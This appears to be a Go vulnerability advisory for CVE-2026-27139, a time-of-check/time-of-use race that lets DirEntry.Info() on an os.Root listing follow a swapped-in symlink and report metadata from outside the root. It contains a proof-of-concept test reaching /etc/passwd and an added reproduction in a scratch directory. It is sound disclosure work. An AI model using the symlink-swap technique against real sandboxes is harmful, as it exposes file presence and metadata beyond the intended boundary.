There is a TOCTOU (time-of-check/time-of-use) race in listing the contents of directories within an os.Root.
On Unix platforms, when reading the contents of a directory using File.ReadDir or File.Readdir, the returned os.FileInfo is populated using lstat on a path built from the directory's name and the entry name. That path is not re-resolved against the root when it is used, so if a component of it is replaced by a symlink between the directory read and the lstat, the lstat call can escape the root.
For example:
package main

import (
	"os"
	"testing"
)

func Test(t *testing.T) {
	dir := t.TempDir()
	r, _ := os.OpenRoot(dir)
	defer r.Close()
	os.Mkdir(dir+"/d", 0o777)
	os.WriteFile(dir+"/d/passwd", nil, 0o666)
	// The check: open d through the Root and read its entries.
	f, _ := r.Open("d")
	defer f.Close()
	ents, _ := f.ReadDir(-1)
	// The race window: d becomes a symlink that leaves the root.
	os.RemoveAll(dir + "/d")
	os.Symlink("/etc/", dir+"/d")
	// The use: Info() lstats dir/d/passwd by path, following the symlink in d.
	// fi is the FileInfo for /etc/passwd.
	fi, _ := ents[0].Info()
	t.Log(fi)
}
The impact of this escape is limited to reading metadata provided by lstat from arbitrary locations in the filesystem. This could be used to probe for the presence or absence of files as well as gleaning metadata like file sizes, but does not permit reading or writing files outside the root.
Because of the relatively limited impact, we are classifying this as a PUBLIC track vulnerability.
This is CVE-2026-27139.
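The following is an added example, not code from the report above or from the Go project. It reproduces the race deterministically under a scratch directory instead of against /etc (the directory names, the "secret" file and its contents are constructed for the example), and contrasts the cached DirEntry.Info() lookup with resolving the same relative name through Root.Lstat, which walks each component with symlinks disallowed and refuses the absolute target.

```go
package main

import (
	"errors"
	"log"
	"os"
	"path/filepath"
)

// OutsideData is constructed sample content for the file planted outside the
// root; a lookup that has escaped reports its length as the size.
const OutsideData = "not-in-root"

// Result records what each lookup observed.
type Result struct {
	BeforeRoot os.FileInfo // Root.Lstat("d/secret") before the swap: the empty in-root file
	ViaInfo    os.FileInfo // cached DirEntry.Info() after the swap: lstat by path
	InfoErr    error
	ViaRoot    os.FileInfo // Root.Lstat("d/secret") after the swap
	RootErr    error
}

// Escaped reports whether the cached entry's Info() returned the metadata of
// the file outside the root, i.e. whether this toolchain is affected.
func (res Result) Escaped() bool {
	return res.InfoErr == nil && res.ViaInfo != nil &&
		res.ViaInfo.Size() == int64(len(OutsideData))
}

// RunRace reproduces the race under base, a scratch directory: base/root is
// the os.Root, base/root/d/secret an empty file inside it, base/outside/secret
// a file outside it. The listing of d is taken through the Root, d is replaced
// by a symlink to base/outside, and only then is Info() called on the entry.
func RunRace(base string) (Result, error) {
	var res Result
	rootDir := filepath.Join(base, "root")
	outside := filepath.Join(base, "outside")
	for _, dir := range []string{filepath.Join(rootDir, "d"), outside} {
		if err := os.MkdirAll(dir, 0o755); err != nil {
			return res, err
		}
	}
	if err := os.WriteFile(filepath.Join(rootDir, "d", "secret"), nil, 0o644); err != nil {
		return res, err
	}
	if err := os.WriteFile(filepath.Join(outside, "secret"), []byte(OutsideData), 0o644); err != nil {
		return res, err
	}

	r, err := os.OpenRoot(rootDir)
	if err != nil {
		return res, err
	}
	defer r.Close()

	// The check: list d through the Root and keep the entries around.
	f, err := r.Open("d")
	if err != nil {
		return res, err
	}
	defer f.Close()
	ents, err := f.ReadDir(-1)
	if err != nil {
		return res, err
	}
	if len(ents) != 1 || ents[0].Name() != "secret" {
		return res, errors.New("unexpected listing of d")
	}
	if res.BeforeRoot, err = r.Lstat("d/secret"); err != nil {
		return res, err
	}

	// The race window: d becomes a symlink whose target is outside the root.
	if err := os.RemoveAll(filepath.Join(rootDir, "d")); err != nil {
		return res, err
	}
	if err := os.Symlink(outside, filepath.Join(rootDir, "d")); err != nil {
		return res, err
	}

	// The use: Info() runs lstat("<root>/d/secret") by path; the symlink in the
	// non-final component d is followed out of the root.
	res.ViaInfo, res.InfoErr = ents[0].Info()

	// Resolving the same relative name through the Root instead walks d with
	// symlinks disallowed and rejects the absolute target as an escape.
	res.ViaRoot, res.RootErr = r.Lstat(filepath.Join("d", ents[0].Name()))
	return res, nil
}

func main() {
	base, err := os.MkdirTemp("", "rootrace")
	if err != nil {
		log.Fatal(err)
	}
	defer os.RemoveAll(base)
	res, err := RunRace(base)
	if err != nil {
		log.Fatal(err)
	}
	log.Printf("DirEntry.Info escaped the root: %v (err=%v)", res.Escaped(), res.InfoErr)
	log.Printf("Root.Lstat after the swap: err=%v", res.RootErr)
}
```

On an affected toolchain Escaped() is true and ViaInfo carries the size of the outside file; on a toolchain with the fix, Info() no longer reports the outside file's metadata. Root.Lstat refuses the escape on every Go release that has os.Root. Two caveats for anyone reproducing this: the lazy lstat only happens when the filesystem supplies d_type in the directory read (otherwise Go stats entries eagerly during ReadDir and the cached result is the in-root one), and the example must run on a Unix platform where symlinks can be created.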